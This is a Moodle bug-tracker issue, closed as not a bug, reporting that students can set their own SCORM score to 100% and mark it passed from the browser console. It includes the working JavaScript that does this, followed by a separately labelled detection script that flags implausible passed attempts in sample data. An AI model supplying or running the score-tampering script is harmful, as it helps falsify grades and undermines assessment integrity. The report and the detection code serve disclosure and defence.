  1. Moodle
  2. MDL-61942

SCORM scores can be manipulated via javascripts

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Minor
    • Resolution: Not a bug
    • Affects Version/s: 3.3.3
    • Fix Version/s: None
    • Component/s: SCORM
    • Labels:
      None
    • Affected Branches:
      MOODLE_33_STABLE

      Description

      Hi, I posted a similar message in the General Help section (without the code), but did not receive a response. I'm not sure if this is the right place to post this.

      The issue is that a user can use JavaScript in the browser developer tools console to change the score they received in the SCORM module. I'm not sure if Moodle is aware of this issue or if this is something beyond Moodle's control. Essentially, I'm saying that with some knowledge of JavaScript, a student can change their grades in the SCORM report! I haven't tried it in other activities.

      I did not purposely try to look for a way to change SCORM scores via JavaScript. I was looking for a better way to track progress for SCORM objects (e.g. created in Articulate Storyline) that doesn't rely on quiz results.

      The code is below. You have to log in as a student for a course with a SCORM object. Then go to Chrome browser Developer Tools > Console > choose the SCORM object > cut and paste the code > You will score 100% in the report without having to complete the SCORM.

       

      function findLMSAPI(win) {
        // look in this window
        if (win.hasOwnProperty("GetStudentID")) return win;

        // all done if no parent
        else if (win.parent == win) return null;

        // climb up to parent window & look there
        else return findLMSAPI(win.parent);
      }

      function setStudentProgressViaScore(setScore) {
        var currentScore = lmsAPI.GetScore();
        if (currentScore < setScore)
          lmsAPI.SetScore(setScore, 100, 0);
      }

      var player = GetPlayer();
      var lmsAPI = findLMSAPI(this);

      setStudentProgressViaScore(100);

      lmsAPI.SetReachedEnd();
      lmsAPI.SetPassed();
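The report above describes a result being recorded without the SCORM being completed. The following is an added example, not part of the original report and not Moodle's code: a plausibility check over SCORM 1.2 tracking elements that flags attempts claiming success with almost no time spent or no recorded interactions. The row shape, both thresholds, and the sample rows are assumptions constructed for illustration.

```javascript
// Added example: flag SCORM 1.2 attempts whose reported result is implausible.
// Rows are constructed sample data; the {user, attempt, element, value} shape
// and both thresholds are assumptions, not Moodle's schema or defaults.
const MIN_SECONDS = 120;     // assumed shortest honest run-through
const MIN_INTERACTIONS = 1;  // assumed: the package records quiz interactions

// SCORM 1.2 CMITimespan "HHHH:MM:SS.SS" -> seconds; NaN if malformed.
function timespanToSeconds(value) {
  const m = /^(\d{2,4}):(\d{2}):(\d{2}(?:\.\d{1,2})?)$/.exec(value || "");
  return m ? Number(m[1]) * 3600 + Number(m[2]) * 60 + Number(m[3]) : NaN;
}

// Group flat tracking rows into one object per (user, attempt).
function groupAttempts(rows) {
  const attempts = new Map();
  for (const { user, attempt, element, value } of rows) {
    const key = `${user}#${attempt}`;
    if (!attempts.has(key)) attempts.set(key, { user, attempt, cmi: {}, interactions: new Set() });
    const a = attempts.get(key);
    const im = /^cmi\.interactions\.(\d+)\./.exec(element);
    if (im) a.interactions.add(im[1]);   // count distinct interaction indexes
    else a.cmi[element] = value;
  }
  return [...attempts.values()];
}

// Return the attempts that claim success, each with the reasons it looks off.
function flagSuspicious(rows) {
  const flagged = [];
  for (const a of groupAttempts(rows)) {
    const status = a.cmi["cmi.core.lesson_status"];
    if (status !== "passed" && status !== "completed") continue;
    const reasons = [];
    const secs = timespanToSeconds(a.cmi["cmi.core.total_time"]);
    if (Number.isNaN(secs)) reasons.push("missing or malformed total_time");
    else if (secs < MIN_SECONDS) reasons.push(`total_time ${secs}s below ${MIN_SECONDS}s`);
    if (a.interactions.size < MIN_INTERACTIONS) reasons.push("no interactions recorded");
    if (reasons.length) flagged.push({ user: a.user, attempt: a.attempt, reasons });
  }
  return flagged;
}

// Constructed sample rows: alice passes in 7 seconds with no interactions.
const SAMPLE_ROWS = [
  ["alice", 1, "cmi.core.lesson_status", "passed"], ["alice", 1, "cmi.core.total_time", "0000:00:07.00"],
  ["bob", 1, "cmi.core.lesson_status", "passed"], ["bob", 1, "cmi.core.total_time", "0000:14:32.10"],
  ["bob", 1, "cmi.interactions.0.id", "q1"], ["carol", 1, "cmi.core.lesson_status", "incomplete"],
].map(([user, attempt, element, value]) => ({ user, attempt, element, value }));
console.log(JSON.stringify(flagSuspicious(SAMPLE_ROWS), null, 2));
```

A flagged attempt is a prompt for manual review, since a fast learner or a package that records no interactions can trip the same thresholds.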

       

            People

            • Assignee:
              Unassigned
              Reporter:
              intist.sro AC Cheng
              Participants:
              Component watchers:
              Damyon Wiese, Dan Marsden, Matteo Scaramuccia, Adrian Greeve, Jake Dallimore, Mathew May, Mihail Geshoski, Peter Dias